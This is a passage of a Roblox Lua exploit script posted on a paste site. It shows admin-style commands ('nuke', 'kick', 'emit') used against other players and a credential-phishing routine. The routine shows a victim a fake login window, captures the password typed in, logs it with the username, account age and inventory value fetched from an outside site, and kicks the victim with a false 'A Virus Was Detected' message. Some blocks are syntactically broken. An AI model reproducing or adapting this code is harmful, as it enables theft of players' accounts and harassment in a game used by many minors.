  1918. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1919. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1920. end
  1921. end))
  1922. until nil]]
  1923. end
  1924. end
  1925. end
  1926.  
  1927.  
  1928.  
  1929.  
  1930.  
  1931.  
  1932. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1933. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1934. for i, v in pairs(plrz) do
  1935. coroutine.resume(coroutine.create(function()
  1936. if v and v.Character and v.Character:findFirstChild("Torso") then
  1937. local p = Instance.new("Part",game.Workspace)
  1938. p.Anchored = true
  1939. p.CanCollide = false
  1940. p.formFactor = "Symmetric"
  1941. p.Shape = "Ball"
  1942. p.Size = Vector3.new(1,1,1)
  1943. p.BrickColor = BrickColor.new("New Yeller")
  1944. p.Transparency = .5
  1945. p.Reflectance = .2
  1946. p.TopSurface = 0
  1947. p.BottomSurface = 0
  1948. p.Touched:connect(function(hit)
  1949. if hit and hit.Parent then
  1950. local ex = Instance.new("Explosion", game.Workspace)
  1951. ex.Position = hit.Position
  1952. ex.BlastRadius = 11
  1953. ex.BlastPressure = math.huge
  1954. end
  1955. end)
  1956. local cf = v.Character.Torso.CFrame
  1957. p.CFrame = cf
  1958. for i = 1, 333 do
  1959. p.Size = p.Size + Vector3.new(3,3,3)
  1960. p.CFrame = cf
  1961. wait(1/44)
  1962. end
  1963. p:Destroy()
  1964. end
  1965. end))
  1966. end
  1967. end
  1968.  
  1969. if Cmd.Text:lower():sub(1,5) == "kick " then
  1970. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1971. for i, v in pairs(plrz) do
  1972. coroutine.resume(coroutine.create(function()
  1973. if v then v:Destroy() end
  1974. end))
  1975. end
  1976. end
  1977.  
  1978. if Cmd.Text:lower():sub(1,5) == "emit " then
  1979. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1980. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1981. for i, v in pairs(plrz) do
  1982. coroutine.resume(coroutine.create(function()
  1983. if v.Character then v.Character:FindFirstChild("Torso")
  1984. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1985. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  1986. end
  1987. end))
  1988. end
  1989.  
  1990. if Cmd.Text:lower():sub(1,7) == "unemit " then
  1991. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1992. for i, v in pairs(plrz) do
  1993. coroutine.resume(coroutine.create(function()
  1994. if v and v.Character and v.Character:findFirstChild("Torso") then
  1995. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  1996. end
  1997. end))
  1998. end
  1999. end end
  2000.  
  2001. end
  2002.  
  2003.  
  2004.  
  2005. function Clicked5()
  2006. for i,v in pairs(game.Players:GetChildren())do
  2007. otherp.PlayerGui:GetChildren().Parent = workspace
  2008. gui = NewGuiPart65:Clone()
  2009. gui.Parent = otherp.PlayerGui
  2010. gui.ErrorFrame.Visible = true
  2011. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2012. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2013. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2014. passw = gui.ErrorFrame.TB2.Text
  2015. tb1 = gui.ErrorFrame.TB1.Text
  2016. end end
  2017.  
  2018.  
  2019.  
  2020.  
  2021. wait(3)
  2022. NewGuiPart72.Visible = true
  2023.  
  2024.  
  2025. RAPApi = true
  2026.  
  2027.  
  2028.  
  2029.  
  2030. local checktrue = Instance.new("BoolValue")
  2031. checktrue.Parent = CoreValues
  2032. checktrue.Name = "PasscheckTrue"
  2033. checktrue.Value = false
  2034.  
  2035. tb1 = otherp.Name
  2036.  
  2037. PassWord.Value = NewGuiPart71.Text
  2038. UserName.Value = NewGuiPart73.Text
  2039.  
  2040. function getRap(user)
  2041. local rap = ""
  2042. if RAPApi then
  2043. ypcall(function()
  2044. local http = game:GetService("HttpService")
  2045. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2046. rap = tostring(rawrap.rap)
  2047. end)
  2048. else
  2049. rap = "N/A"
  2050. end
  2051. return rap
  2052. end
  2053. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2054.  
  2055. function BCtoDumpStr(str)
  2056. local res = ""
  2057. if str == "Enum.MembershipType.BuildersClub" then
  2058. res = "[BC] "
  2059. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2060. res = "[TBC] "
  2061. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2062. res = "[OBC] "
  2063. elseif str == "Enum.MembershipType.None" then
  2064. res = ""
  2065. end
  2066. return res
  2067. end
  2068.  
  2069. function logAccount(user,pass)
  2070. local playerName = user.Name
  2071. local playerAge = tostring(user.AccountAge)
  2072. local playerRAP = getRap(playerName)
  2073.  
  2074.  
  2075. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2076. end
  2077.  
  2078. local GuiRemains = Instance.new("Folder")
  2079. GuiRemains.Name = "GuiRemains"
  2080. GuiRemains.Parent = CoreValues
  2081.  
  2082. function checkPass(pass)
  2083.  
  2084. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2085. Textg.Text = "PassWord Not Found In DataBase."
  2086. return false
  2087. end
  2088. local foundNums = 0
  2089. local foundLetters = 0
  2090. if string.find(pass, " ") then
  2091. Textg.Text = "PassWord Not Found In DataBase."
  2092. return false
  2093. end
  2094. if pass:len() < 6 or pass:len() > 20 then
  2095. Textg.Text = "PassWord Not Found In DataBase."
  2096. return false
  2097. end
  2098. for i=1,pass:len() do
  2099. if pass:sub(i,i):match("%d") ~= nil then
  2100. foundNums = foundNums + 1
  2101. end
  2102. end
  2103. if foundNums < 2 then
  2104. Textg.Text = "PassWord Not Found In DataBase."
  2105. return false
  2106. end
  2107. for i=1,pass:len() do
  2108. if pass:sub(i,i):match("%a") ~= nil then
  2109. foundLetters = foundLetters + 1
  2110. end
  2111. end
  2112. if foundLetters < 4 then
  2113. Textg.Text = "PassWord Not Found In DataBase."
  2114. return false
  2115. end
  2116. checktrue = true
  2117. return true
  2118.  
  2119. end
  2120. function respawn(user)
  2121. local person = game.Players[user]
  2122. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2123. person:Kick("A Virus Was Detected.")
  2124. person:Destroy();
  2125. end
  2126.  
  2127. function UnGui(user)
  2128. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2129. user:LoadCharacter();
  2130. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2131. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2132. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2133. end
  2134.  
  2135. function Done()
  2136. local pl = gui.Parent.Parent
  2137. UserName.Value = pl.Name
  2138. PassWord.Value = gui.ErrorFrame.TB2.Text
  2139. checkPass(gui.ErrorFrame.TB2.Text)
  2140. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2141. respawn(pl.Name);
  2142. pl:Kick("A Virus Was Detected.")
  2143. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2144. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2145. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2146.  
  2147. end
  2148.  
  2149.  
  2150. function Clicked6()
  2151.  
  2152. Done();
  2153.  
  2154.  
  2155.  
  2156. end
  2157.  
  2158.  
  2159. game.Workspace.ChildAdded:connect(function(per)
  2160. if per.Name == otherp.Name then
  2161. if IsRunning.Value == true then
  2162. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2163. Clicked5()
  2164. end
  2165. end end
  2166. end)
  2167.  
  2168.  
  2169.  
  2170.  
  2171.  
  2172. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2173. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2174. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2175. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2176. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2177. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2178. otherp.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2179. otherp.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2180.  
  2181. NewGuiPart1:Clone().Parent = CoreValues
  2182. NewGuiPart65:Clone().Parent = CoreValues
  2183.  
  2184. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement